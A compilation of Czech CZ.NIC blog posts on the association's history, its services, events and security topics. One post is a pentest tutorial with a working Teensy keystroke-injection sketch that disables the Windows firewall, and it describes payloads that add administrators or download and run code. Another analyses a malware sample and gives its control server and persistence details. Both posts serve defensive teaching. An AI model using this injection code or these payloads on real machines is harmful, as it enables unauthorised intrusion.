Sdružení CZ.NIC má za sebou 15 let „života“, ale z virtuální existence do reality se přeneslo až v roce 2000, kdy se usídlilo v Lužné ulici ve Vokovicích a na této adrese zůstalo až do roku 2006, kdy se přestěhovalo do stávajících prostor na pražských Vinohradech.
Můj příspěvek k letošnímu výročí založení sdružení měl zadání „milá vzpomínka“, ale ono to moc mile nejde, protože úplné začátky, kterým se ve svém příspěvku budu věnovat především, rozhodně jednoduché a příjemné nebyly. Ať už držitelé domén nebo ti, kteří o doménu měli zájem, totiž ze sdružení moc radost neměli, troufám si říct, že právě naopak. Není se čemu divit – do září 1999 byly domény zadarmo a pak přišel „nějaký CZ.NIC“, o kterém do té doby nikdo neslyšel a chtěl 840 Kč za prodloužení registrace, jinak že prý doménu zruší. Opravdu tak učinil a na začátku února 2000 se o uvolněné domény strhla mela, která do české internetové historie vstoupila pod pojmem „doménová řež“ – domény, které byly zrušeny, neboť je jejich držitelé nezaplatili, byly uvolněny k registraci. Tahle událost se doposud projevuje, byť už jen mírně, ve statistikách. Sdružení si z toho ale vzalo ponaučení, a tak když bylo rozhodnuto (2001) o tom, že budou k registraci uvolněny domény dosud pro registraci zakázané (generické, country code), stalo se tak na základě veřejné dražby (2002), přičemž výtěžek ve výši cca 0,5 mil. Kč byl darován Centru Paraple.
Po žebříčku oblíbenosti CZ.NIC nezačalo stoupat ani potom (dnes bychom řekli, že měl dost negativní PR). Působilo jako správce registru a jediný registrátor zároveň a navíc samo o sobě žádnou faktickou činnost nevykonávalo; technicky vše zajišťovala společnost EUnet. S nevolí se tedy setkávala dnes už těžko představitelná cena (1600 korun za novou registraci a 800 korun za prodloužení na rok, žádné slevy nebyly), byť přirozeně, tak přece jen monopolní postavení a nebo způsob komunikace. Údaje v registru byly velmi často nesprávné a situace se nelepšila, proto od roku 2004 funguje upozorňování držitelů domén na e-maily na doméně obvykle zřizované, uvedené na webových stránkách a nakonec také telefonicky – díky tomu se počet domén, které byly zrušeny z důvodu nezaplacení, aniž by se o tom jejich majitel dozvěděl, dramaticky snížil až na hodnotu blížící se limitně nule. Dnešní kolegové ze zákaznické podpory (snad můžu prozradit, že sami si říkají „helldesk“ nebo také „zákaznická potvora“, ale určitě víte, že to jsou milí a kompetentní lidé) tak už nemusejí řešit telefonáty diplomaticky řečeno velmi naštvaných bývalých držitelů, kteří nezaplatili za doménu a ta jim byla zrušena, aniž by se o tom dozvěděli.
Nepříjemné byly také aktivity tzv. doménových spekulantů – pamatujete si na Pavla Šimona a Vladanu Petržílkovou? Bylo jich více, ale tito byli nejznámější a na rozdíl od různých Mickey Mousů nebo seychelských společností, pod něž se schovávají Spekulanti 2.0 či dokonce 3.0, se jednalo o skutečné lidi, dokonce s pravdivými údaji v registru. Domény totiž bylo možné registrovat, ale poplatek se hradil až po zaregistrování; čili pokud jste nezaplatili vůbec, mohli jste doménu blokovat zdarma po dobu 45 dnů a po zrušení zaregistrovat znovu a znovu a znovu….což výše jmenovaní pochopitelně zhusta činili. Situaci v tomto směru vylepšily nejprve tzv. speciální žádosti, které byly zavedeny v březnu 2002, jejichž podstatou bylo, že zájemce mohl požádat o doménu, která byla již registrovaná, ale byla „po expiraci“ čili ve splatnosti poplatku. Pokud držitel za doménu nezaplatil, získal ji takový „speciální žadatel“, který podal žádost nejdříve a zaplatil zálohu za registrační poplatek. Bylo-li takových žadatelů více, tak neúspěšným se zaplacené zálohy vracely, totéž platilo tehdy, pokud za doménu zaplatil její držitel. Systém registrací se pak změnil v roce 2003, kdy do hry vstoupili registrátoři a domény už nebylo možné registrovat bez toho, že by za ně bylo uhrazeno. Sdružení však stále fungovalo jako registrátor, byť „poslední záchrany“ – Last Resort Registry (LRR), byť jeho činnost v tomto směru byla postupně omezována (ať již nemožností doménu registrovat na delší dobu než 1 rok – u registrátora to bylo možné až na 10 let, jako je tomu doposud , posléze nebylo možné doménu v LRR prodloužit, čímž se CZ.NIC definitivně zbavilo domén, u nichž bylo vedeno jako registrátor, a rovněž cenou, která zůstala stejná, tedy stejně vysoká) a v říjnu 2007 s převzetím registračního systému do vlastní správy LRR skončil úplně.
Tímto počinem, tedy zajištěním správy domény vlastními silami, nikoliv formou outsourcingu, se, alespoň v mých očích, začala psát novodobá historie sdružení, která s sebou přinesla dramatický obrat ve vnímání sdružení navenek. Pochopitelně, nejcitelněji k tomu přispělo snížení ceny za doménu, protože prostě platí, že peníze jsou až na prvním místě. Ale nejsou samozřejmě všechno: sdružení se snaží a myslím, že se mu to i daří, být transparentní, otevřené, systém registrací je průhledný a jednoduchý a prostředky, které sdružení za domény získá, se snaží internetové komunitě vracet ve formě svých dalších činností, kterým se věnuje, zpět. Ohlédnu-li se zpět, jsem přesvědčena, že cesta, která byla vybrána v roce 2005, a po které se sdružení, budu-li se držet turistické terminologie, s občasným ujištěním se pohledem do mapy, stále ubírá, byla správná.
Zuzana Průchová (Durajová)
Máte nápad Jak na Internet? Sem s ním!
Loni v říjnu a listopadu odvysílala Česká televize, konkrétně její první kanál, dvě série našeho vzdělávacího projektu s názvem Jak na Internet. Ano, bavíme se o aktivitě, která má široké veřejnosti přiblížit svět Internetu se všemi jeho možnostmi, výhodami a nevýhodami a dobrými i špatnými stránkami. Na loňské dvě série, které byly kompletně v naší režii, hodláme letos navázat. Přesný termín vysílání vám zatím nemůžeme sdělit, teď jde o něco jiného.
V těchto dnech dáváme dohromady nápady na další díly, a protože (většinou) víc hlav víc ví, obracíme se také na vás, abyste nám řekli, co byste v pokračování seriálu Jak na Internet rádi viděli, co v něm ještě nebylo nebo co by si zasloužilo větší prostor. Uvítáme jak tipy na jednotlivé spoty, tak anotace, kterými tyto své nápady doprovodíte. A nechceme to samozřejmě jen tak. Tři nejlepší, kteří „přihlásí“ alespoň tři nosná témata (včetně anotací), odměníme novým iPodem nano (16GB).
Co této nabídce říkáte? Chcete se stát spoluautory nových sérií Jak na Internet? Kdo už teď souhlasně kývá hlavou, tak právě pro něj je tu adresa jni@nic.cz (předmět: JNI 2013). Napište nám do příští středy (22. 5.); my potom zveřejníme ty nejlepší nápady a jejich autory odměníme. Děkujeme, že se s námi do této hry pustíte, a těšíme se na spolupráci.
A jedno velké motivační číslo na závěr. První dvě série Jak na Internet mají do této doby podle našich informací 13 milionů shlédnutí. Doufáme, že se nám i s vašimi nápady povede dosáhnout ještě lepšího výsledku.
Aktualizace, 23. 5. 2013
Do této doby jsme dostali podněty od dvou účastníků soutěže se seriálem „Jak na Internet“. Oba dva bohužel nesplnili podmínky této akce, a proto je nemůžeme odměnit cenami. Není ale všem soutěžím konec. Nějakou zase vymyslíme a budeme se těšit, že se tentokrát setkáme s větším zájmem.
Vilém Sládek
1. květen a mojeID. Co je nového?
Účet mojeID, služby bezpečných ověřených internetových identit, si včera založil uživatel s pořadovým číslem 200.000. Této pomyslné mety služba dosáhla téměř přesně po 30 měsících od spuštění ostrého provozu. Zajímavé na této informaci je to, že ještě předloni bylo avizováno dosažení 100.000 uživatelských účtů do tří let, přičemž dnes, v polovině třetího roku, jsme již na 200% tohoto cíle.
Neméně zajímavou novinkou je zavedení mojeID na weby skupiny Nova (CET 21) v čele s magazíny Nova.cz, TN.cz, Doma.cz a Krásná.cz, nevyjímaje online videopůjčovnu Voyo.cz a v neposlední řadě také největší tuzemský publikační systém Blog.cz.
Skupina Nova se tak stala již šestým mediálním domem v řadě – po boku Mladé fronty, Internet Infa, Economie, Tiscali Media a Extra Publishing – který se zapojil do podpory mojeID.
Úspěch zaznamenalo mojeID v uplynulých několika týdnech také na poli e-commerce, kde se podařilo zavést tuto autentizační službu do e-shopů Mironet.cz nebo Parfums.cz, které představují špičky ve svých oborech.
Oblastí, kde má mojeID značný potenciál, je také podpora e-Demokracie. Prvním krokem je implementace mojeID do portálů měst a obcí, provozovaných na systémech Galileo Corporation, kde např. při hlasování v místní anketě v obci Droužkovice je předáván pouze atribut obce. To umožňuje starostovi i zastupitelstvu zjistit, kolik hlasujících bylo z obce a kolik odjinud.
Ověřené identity v mojeID plánuje v rámci Evropské občanské iniciativy za zrušení střídání času využít rovněž senátor Petr Šilar, který se tak chce vyhnout především smyšleným nebo neuznatelným podpisům, které vyřadily některé kandidáty z nedávné volby prezidenta.
S přibývajícími službami zapojenými do mojeID roste také počet platforem, na nichž je mojeID provozováno. Není přitom zcela v našich silách udržovat vzorové implementace pro všechny systémy, o to více si vážíme spolupráce partnerů, kteří jsou ochotni uvolnit zdrojový kód vlastní implementace mojeID jako open-source. Posledním z těchto partnerů je ACTIVE 24, který pro nás připravil dosud chybějící vzorovou implementaci mojeID pro Javu.
Ondřej Písek
Nová verze mojeID je především o bezpečnosti
Před nedávnem vydali kolegové z technického oddělení novou verzi služby mojeID. Novinky s ní spojené se týkají především bezpečnosti, která je u nás na prvním místě. V mojeID se nyní můžete setkat například s nápovědou, která vám ukáže sílu navrženého hesla. Změny se dočkala také správa certifikátu pro přihlašování.
Je toho více a protože obraz vydá za 1000 slov, podívejte se na video, ve kterém vám technický ředitel CZ.NIC Jaromír Talíř řekne vše důležité.
Jinak brzy se dočkáme registrace jubilejního držitele mojeID. V této souvislosti bychom vás chtěli informovat o dalších zajímavostech spojených s touto službou. Za pár dnů tedy opět u mojeID.
Vilém Sládek
Dnes je MDŽ, ale v ICT
Pracujete v ICT průmyslu? A když se kolem sebe rozhlédnete, kolik žen vývojářek, administrátorek, programátorek, analytiček, zkrátka odborných IT pracovnic kolem sebe vidíte? Předpokládám, až na výjimky, že moc ne.
V České republice podle údajů Eurostatu (2011) pracuje na odborných pozicích v ICT jen něco málo přes deset tisíc žen, mužů desetkrát tolik. Zatímco v Evropské unii připadá průměrně jedna žena na pět mužů. V ČR je toto číslo dvojnásobné a řadí se tak na nejhorší příčku v celé EU. Mezinárodní telekomunikační unie (ITU) vyhlásila na dnešní den, 25. dubna, Mezinárodní den žen v ICT právě proto, aby upozornila na tuto nerovnováhu.
Naše akademie vítá tuto iniciativu, a tak bychom chtěli podpořit vzdělání žen a dívek v oblasti internetových technologií. Proto pro ně dnes máme speciální nabídku.
Vyberte si libovolný kurz z nabídky Akademie CZ.NIC, vaši volbu nám zašlete na e-mailovou adresu akademie@nic.cz a získejte slevu 50 % z ceny kurzu a květinu jako dárek k tomu. Budeme se na vás těšit.
Igor Kytka
Internet základ života
Internet je pro generaci dnešních školáků jednoznačně nejdůležitějším prostředím pro komunikaci, zábavu i sdílení, například domácích úkolů. Používají ho každý den a někdy ani neví, jestli už jsou zase on-line, nebo ještě pořád. Kolik takových uživatelů však ví, jak se po zadání adresy, například blog.nic.cz, dostali až sem? Na požadovanou stránku bez toho, aby byli po cestě přepadeni internetovými piráty a hackery?
V Akademii CZ.NIC se snažíme rozšiřovat povědomí o internetových technologiích, aby uživatelé znali prostředí Internetu i to, jaké hrozby skrývá. Pořádáme technicky zaměřené kurzy pro studenty středních a vyšších odborných škol, přednášíme o bezpečném pohybu na síti, poskytujeme další vzdělávání pedagogům. A proto jsme i letos pro učitele IT předmětů připravili kurz, na kterém se seznámí s fungováním technologií, které dělají Internet Internetem.
Účastníci se například dozví, jak funguje DNS – systém názvu internetových adres neboli domén. Dozví se mimo jiné i to, kdo se vlastně o internetové domény stará v Česku a ve světě. A třeba taky proč v nich zatím nepoužíváme háčky a čárky. Na závěr budou mít účastníci možnost ve společné diskuzi sdílet zkušenosti týkající se výuky internetových technologií a dozvědět se o nových projektech pro školy. Kurz se koná ve spolupráci s Jednotou školských informatiků a je akreditován v systému DVPP.
Pokud jsme se s touto zprávou trefili právě do vašeho profesního zaměření, neváhejte a přihlaste se emailem na adrese akademie@nic.cz. Jinak budeme samozřejmě rádi, když tuto nabídku rozšíříte k těm, kterým by byla k užitku. Děkujeme předem.
Igor Kytka
Připravte se, čeká vás týden internetových technologií
Období května a června je už několik let v CZ.NIC ve znamení finálních příprav na konferenci Internet a Technologie. A po roční pauze, kdy jsme „ITčko“ vystřídali za IPv6 den (IT 12 bylo potom v listopadu), se k této tradici opět vrátíme. A kdyby vám snad přísun internetových témat z CZ.NIC pro letošní jaro nestačil, máme dobrou zprávu – na naši konferenci naváže první Peering Day, který chystá NIX.CZ. U obou akcí už se můžeme podělit o důležité detaily včetně termínu, tak si je pojďme představit blíže.
Pokud jde o Internet a Technologie 13, do diářů si už teď můžete poznamenat, že se uskuteční 20. a 21. května v Ballingově sále Národní technické knihovny v pražských Dejvicích. První den konference bude věnovaný tématům spojeným s IPv6, v plánu je opět panelová diskuse. V jednom z prvních bloků se představí registrátoři (ACTIVE 24, INTERNET CZ, WEDOS Internet a ZONER software) a na závěr první části dostanou slovo kolegové z Laboratoří CZ.NIC. Druhý den se mohou zájemci těšit na prezentace pana Jiřího Peterky, Martina Semráda z NIX.CZ nebo na panelovou diskusi o chystaném kybernetickém zákonu. Ale připravujeme toho mnohem víc. Co konkrétně, to prozradíme až na začátku května se spuštěním stránek IT 13 s kompletním programem a přihlašovacím formulářem.
Jen dva dny na to se na Letišti Václava Havla uskuteční vůbec první konference o tématech propojovacích uzlů ve středoevropském regionu. Pořádá ji NIX.CZ, český peeringový uzel, společně se svým vídeňským protějškem VIX.at. Témata přednášek jsou tedy poměrně jasná; mluvit se bude o peerování, o datacentrech, o spolupráci mezi IXP atd. Mezi přednášejícími budou například hosté z RIPE NCC a EURO-IX, českou odbornou veřejnost zde zastoupí například Ondřej Filip z CZ.NIC s příspěvkem o routovacím démonu BIRD. Více informací o této výjimečné akci najdete na webu NIX.CZ opět na začátku května.
Konec května tedy bude patřit internetu a internetovým technologiím. Že si nejsou obě akce nijak vzdálené, dokumentuje i „konferenční dopravní autobusová linka“. Z Vítězného náměstí se na Letiště Václava Havla dostanete za pár minut populárním spojem číslo 119.
Vilém Sládek
Teensy jako nástroj pro penetrační testování
USB je stále často podceňovaným místem, přes které může být kompromitován operační systém. Kromě klasického šíření malware pomocí USB Mass storage disků, Flash disků s podporou U3, které umožňují obejít dnes již ve většině operačních systémů existující blokaci autorun funkce, a hardwarových keylogerů stojí za pozornost programovatelná zařízení, která se vůči systému chovají jako klávesnice. Jedno takové zařízení bych tu dnes chtěl krátce prezentovat.
Pro fanoušky open-source platformy Arduino nebude pravděpodobně ani Teensy zcela neznámé. Pro ty, kteří zatím neměli tu čest, jen krátké představení. Jedná se o jednočipové počítače, které jsou vhodné pro různé jednoúčelové aplikace jako je řízení, či regulace. Takové Arduino můžete například použít k řízení nějakého vašeho vozítka či na něm naprogramovat jednoduchý webový server a připojit jej k internetu. My se však dnes zaměříme na Teensy a především na možnost využití tohoto zařízení k penetračnímu testování.
Toto zařízení má totiž hned tři výhody, je malé, takže se snadno vměstná například do útrob počítačové myši, jeho pořizovací cena je kolem $20 a především, z pohledu počítače se umí hlásit jako MIDI/USB/HID zařízení, což mimo jiné znamená, že počítač jím zadaná data interpretuje jako povely od uživatele. Tady se právě otevírá cesta pro využití při penetračním testování. Ale pojďme pěkně po pořádku.
Teensy ++ 2.0 ve srovnání s běžným flash diskem
Kromě samotného zařízení – já jsem vše testoval na Teensy ++ ve verzi 2.0 – potřebujeme ještě obslužný software. Pokud si chcete následující proceduru ušetřit, můžete sáhnout po distribuci Backtrack 5 R3, kde už je jak ADE, tak i podpora pro Teensy implementována. V opačném případě na této adrese stáhneme nejdříve Arduino Development Environment (ADE) pro námi požadovanou platformu a rozbalíme jej na disk. Pokud pracujeme na linuxu, pak musíme ještě udělit non-root uživatelům práva k použití Teensy.
sudo cp 49-teensy.rules /etc/udev/rules.d/
Arduino software však sám o sobě nepodporuje Teensy, je proto potřeba podporu pro Teensy doinstalovat. Stáhneme tedy instalátor rozšíření teensyduino pro náš OS a spustíme jej. Během instalace teensyduino budeme vyzváni k zadání cesty k rozbalenému software pro Arduino. V aplikaci ADE by se měla nyní objevit podpora pro Teensy. Po spuštění programu ještě vybereme naši desku, v mém případě Teensy ++ 2.0 a jako USB Type nastavíme kombinaci Keyboard+Mouse+Joystick.
Nastavení programu Arduino Development Environment
Nyní již zbývá jen připojit naše zařízení. Pokud si chceme ověřit, že vše správně funguje, můžeme nahrát náš první program. Než se pustíme do vlastních programů, můžeme využít předpřipravené ukázky. Pod File –> Examples –> Teensy najdeme množství připravených prográmků, kterým se zde říká Sketch. Na první vyzkoušení doporučuji položku Tutorial1 –> Blink. Po nahrání zdrojového kódu klepneme na upload, náš sketch se automaticky zkompiluje a nahraje do zařízení. Po úspěšném nahrání by na zařízení měla začít blikat dioda. Pokud se tak nestalo, zkuste zmáčknout tlačítko, které je na desce.
Pro psaní vlastních programů použijeme jazyk Arduino Programmable Language, lze však použít i klasický programovací jazyk C. Každý sketch musí vždy obsahovat funkce setup a loop, jinak jej kompilátor nepřijme.
Základ každého programu pro Teensy
Začněme klasikou, následující program, díky skutečnosti, že se Teensy chová po připojení k počítači jako klávesnice, vypíše „Hello World“.
void setup()
{
Keyboard.print("Hello World");
}
void loop()
{
}
Pro informaci, pokud bychom příkaz umístili do smyčky loop, bude se Hello World vypisovat stále dokola. Nyní se pojďme podívat, jaké další zajímavé věci můžeme vyzkoušet.
Pokud se podíváme na tuto adresu, můžeme si najít informace o možnostech zadání všech obvyklých znaků. Zajímavé jsou také Modifier Keys, což jsou funkční klávesy, kde například MODIFIERKEY_GUI je vlastně klávesa WIN. Pojďme se nyní podívat, jakým způsobem může této skutečnosti využít útočník. Následující sketch provede tyto kroky – na začátku vyčká 5000ms, to aby došlo ke korektnímu připojení zařízení k operačnímu systému. Dále spustí klávesovou zkratku WIN R, což ve windows vyvolá okno pro spuštění programu. Do něj pak zapíše příkaz cmd pro spuštění příkazové řádky. Ve finále pak příkazem netsh firewall set opmode disable vypne firewall ve windows.
void setup()
{
delay(5000);
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
delay(500);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print("cmd");
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
delay(2000);
Keyboard.print("netsh firewall set opmode disable");
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void loop()
{
}
Takto po připojení k počítači s OS windows dojde k vypnutí firewallu, na což windows zareagují informací o možném ohrožení počítače
Jak je vidět, Teensy se skutečně chová z pohledu PC jako klávesnice. Díky možnostem, které nabízí unixové shelly nebo třeba powershell ve windows, otevírá toto zařízení zajímavé možnosti při penetračním testování. Představte si, že toto zařízení zamaskujete jako počítačovou myš, USB disk či nějaký USB gadget a necháte jej ležet na vhodném místě, třeba na recepci a nahrajete do něj vlastní kód, který pomocí powershellu například přidá nový účet a spustí remote desktop. I přes fakt, že si většina těchto prográmků otevře nejdříve okno pro zadávání příkazů, jsou prý útoky pomocí tohoto zařízení úspěšné. Pokud si však jako oběť vybere útočník počítač běžného firemního uživatele, asi to není zas až tak divné. Ze své osobní zkušenosti ze společnosti, kde se používala Active Directory a kde se při každém přihlášení počítače spouštěli různé skripty, mohu říci, že jedno okno s MSDOS navíc bych při přihlášení nejspíš také nezaregistroval.
Osobně jsem se o tomto zajímavém zařízení dozvěděl při prezentaci o programu kautilya napsaném v jazyce Ruby, který umí generovat různé ukázkové sketche pro Windows, Linux i OS X zaměřené právě na penetrační testování.
Starší verze programu Kautilya ještě bez podpory OS X je již součástí distribuce Backtrack
Jeden z těchto sketchů dokáže například stáhnout spustitelný kód uložený na serveru pastebin v textovém formátu, převést jej zpět na exe a spustit jej na pozadí na počítači oběti. Další zase dokáží přidat nového administrátora, povolit vzdálenou plochu, či na pozadí spustit instanci prohlížeče s konkrétní URL.
Pojďme si ještě krátce říci, jak se lze proti zneužití takovéhoto zařízení vůči námi spravovaným počítačům bránit. Ve světě operačních systémů společnosti Microsoft můžeme pomocí skupinové politiky zakázat běžným uživatelům instalaci nového hardware. V linuxu pak můžeme pomocí UDEV rules například povolit pouze známá zařízení.
Microsoft nabízí přes gpedit.msc několik způsobů pro blokování instalace nových zařízení
Pavel Bašta
Jak se chytá malware
Včera jsme od jednoho uživatele z ČR obdrželi odkaz (http://www.goo.gl/XXXXXXX=IMG0540240-JPG), který dostal jeho známý přes Skype. Byli jsme požádáni o informaci, co se mohlo na tomto počítači stát, jaké to mohlo mít dopady a jak se případného viru zbavit. Zkusili jsme tedy analyzovat zaslaný odkaz v předem připraveném virtuálním prostředí. Samotná návštěva odkazu (zamaskovaný odkaz ve skutečnosti míří na IP adresu 94.242.198.64) vede k tomu, že je uživateli nabídnut ke stažení soubor s názvem IMG0540240-JPG.src.
Nepozorný uživatel snadno přehlédne skutečnou koncovku souboru, kterou je .scr
Po spuštění programu se v domovském adresáři aktuálního uživatele vytvoří složka S-500-9430-5849-2045, která je nastavena jako skrytá a systémová, takže při běžném nastavení Windows ji uživatel nevidí. V této složce je pak umístěn soubor winmgr.exe. Zároveň je do registrů přidán klíč Microsoft Windows Manager, kvůli zajištění automatického spuštění malwaru po startu Windows.
Program se po spuštění pokouší o připojení na IP adresu 94.242.198.64 na port 5050. Při našem prvním testu se mu to také podařilo, stáhl si instrukce a začal se pokoušet o rozesílání e-mailové pošty. Předpokládáme, že pokud by na testovacím systému byl funkční Skype, malware by se pokoušel šířit i jeho prostřednictvím. Bohužel se však v tu chvíli testovací systém odporoučel a nemáme tak k dispozici zachycené pakety pro detailnější analýzu. Při pozdějších pokusech se již malwaru se serverem kontaktovat nepodařilo. Server je nyní odpojen. Otázkou je, zda je to pouze dočasné nebo již byl odpojen definitivně.
Paket zachycený programem wireshark
Který program se pokouší o připojení lze dobře sledovat také pomocí programu TCPView
Soubor winmgr.exe jsme otestovali pomocí on-line nástroje virustotal.com a v současné chvíli jej rozpozná pouze 12 ze 46 antivirových programů. Bohužel mezi těmi „slepými“ jsou v současné chvíli i antiviry, které jsou hojně používané v ČR. Naštěstí podle analyzátoru společnosti Google na tento odkaz klikají především uživatelé v okolních zemích. Nelze však vyloučit, že u nás koluje jiný odkaz směřující na stejný malware a že tento odkaz může mít v ČR daleko více kliknutí.
Antiviry jsou zatím slepé
Na tento odkaz již kliklo 137 069 uživatelů
Jako obranu doporučujeme v první řadě neklikat na příchozí odkazy upozorňující uživatele na údajné fotky, na kterých by měli být zobrazeni, i když záminky, které mají uživatele donutit ke kliknutí, se mohou měnit. Pokud však již uživatel na odkaz kliknul a soubor spustil, je potřeba zachovat klidnou hlavu a v první řadě ukončit přes správce úloh proces winmgr.exe. Dále je potřeba smazat samotný soubor winmgr.exe ve složce S-500-9430-5849-2045. Je však potřeba nejdříve zapnout zobrazování skrytých a systémových souborů. Pak ještě odebereme z registrů klíč Microsoft Windows Manager a po restartu by mělo být již vše v pořádku.
Tento malware se nezdá být příliš sofistikovaný. Jeho závislost na jednom serveru i jeho relativně snadné odstranění ze systému ukazují spíš na práci někoho, kdo si možná jen chtěl vyzkoušet své možnosti. Přesto náš další krok bude distribuce vzorku tohoto malware antivirovým výrobcům.
UPDATE: Po napsání tohoto blogpostu se server na IP adrese 94.242.198.64 opět rozběhl. Stávající malware si z něho poté stáhl bratříčka, soubor bget.exe. Ten se v systému zahnízdil jako soubor 0584105130.exe v adresáři LOCALS~1\Temp\ v domovském adresáři uživatele. Tento soubor se v registru nachází hned na několika místech. Je tedy potřeba prohledat registr na výskyt „0584105130“ a všechny klíče odstranit. Po tomto kroku doporučujeme provést preventivní kontrolu systému některým z bootovatelných antivirových CD.
Pavel Bašta
Nežijeme v bublině
V ČR nežijeme v bublině, které by se netýkaly problémy počítačové bezpečnosti. Proto bychom se po delší době chtěli opět podělit o některé zajímavé incidenty, se kterými jsme se v průběhu přibližně posledního roku setkali. U některých z nich je navíc zajímavé, že jste se o nich mohli dozvědět jako o něčem, co se někde odehrává, ale co si možná podvědomě představujeme jako něco, co se děje tam někde „venku“. Děje se to však i u nás, a proto je potřeba věnovat otázce počítačové bezpečnosti adekvátní prostor. Snad vás o tom přesvědčí i příklady některých incidentů, které jsme v CSIRT.CZ řešili, a které ukazují, že bezpečnost se týká nás všech, uživatelů i administrátorů. Z důvodů zachování anonymity zainteresovaných stran bohužel nemůžeme být příliš konkrétní, ale i přesto doufám, že pro vás budou následující řádky varováním.
V červnu minulého roku nás CERT-EU informoval o útoku, při kterém byla uživatelům v některých zemích odeslána e-mailová zpráva, která vypadala jako oficiální komunikace Evropské komise. V té chvíli jsme ještě netušili, že neznámý malware obsažený v přiloženém MS Word dokumentu a v rámci ČR odeslaný úředníkům jednoho českého ministerstva a jedné zdejší bance vstoupí do dějin jako špionážní malware Red October. O jeho existenci byla veřejnost informována v lednu tohoto roku, kdy se ukázalo, že po několik let sledoval vládní, diplomatické a výzkumné organizace ve východní Evropě. To, že se podařilo díky spolupráci CSIRT týmů v Evropě zabránit infikování desítek uživatelů v různých institucích půl roku před objevením tohoto malware, považujeme za slušný úspěch.
V posledním půl roce také pravidelně spolupracujeme s US-CERT a to v souvislosti s výskytem botnetu, který pro své fungování využívá webové servery. Šíří se především prostřednictvím zranitelných verzí známých redakčních systémů, jako je Joomla či WordPress. I když se může na první pohled zdát, že zranitelných webů je méně než zranitelných domácích počítačů, menší počet jednotlivých zapojených „botů“ útočníkům vynahradí rychlé linky, na kterých jsou obvykle servery připojené. Takto napadené servery se dle našich informací momentálně zneužívají především pro DDoS útoky na cíle v USA. V podstatě každý týden dostáváme informace o desítkách nových webových serverů v ČR, které jsou tímto způsobem zotročeny.
Za zmínku také stojí spolupráce CERT.BE, který získal logy přístupů na webovou stránku umístěnou na serveru v Belgii. Tato stránka šířila nebezpečný malware, který některé antivirové programy vůbec nedokázaly detekovat. Mezi počítači, které tento web navštívily, bylo také několik IP adres z České republiky. Podle informací, které jsme od námi kontaktovaných správců obdrželi, se skutečně tyto počítače při návštěvě tohoto webu nakazily a jejich uživatelé neměli vůbec tušení, že jejich počítač je infikován.
Začátkem března jsme se také podíleli na distribuci informací o novém rootkitu pro Linux, který se v systému usadí v podobě knihovny spojené s SSHD a u kterého zatím není jasné, jakým způsobem se do systému dostává. Mezi potenciálně infikovanými servery bylo i několik serverů z ČR.
Na závěr bych ještě zmínil, že jsme se již setkali také s případem vydírání, kdy bylo po jednom menším serveru požadováno „výpalné“ s tím, že dokud nezačne platit, bude na něj pravidelně podnikán DDoS útok.
Jak je vidět, kybernetická kriminalita a útoky se nevyhýbají ani České republice a je třeba na to pamatovat při naší každodenní práci, ať už z pohledu uživatele, nebo z pohledu správce IT.
Pavel Bašta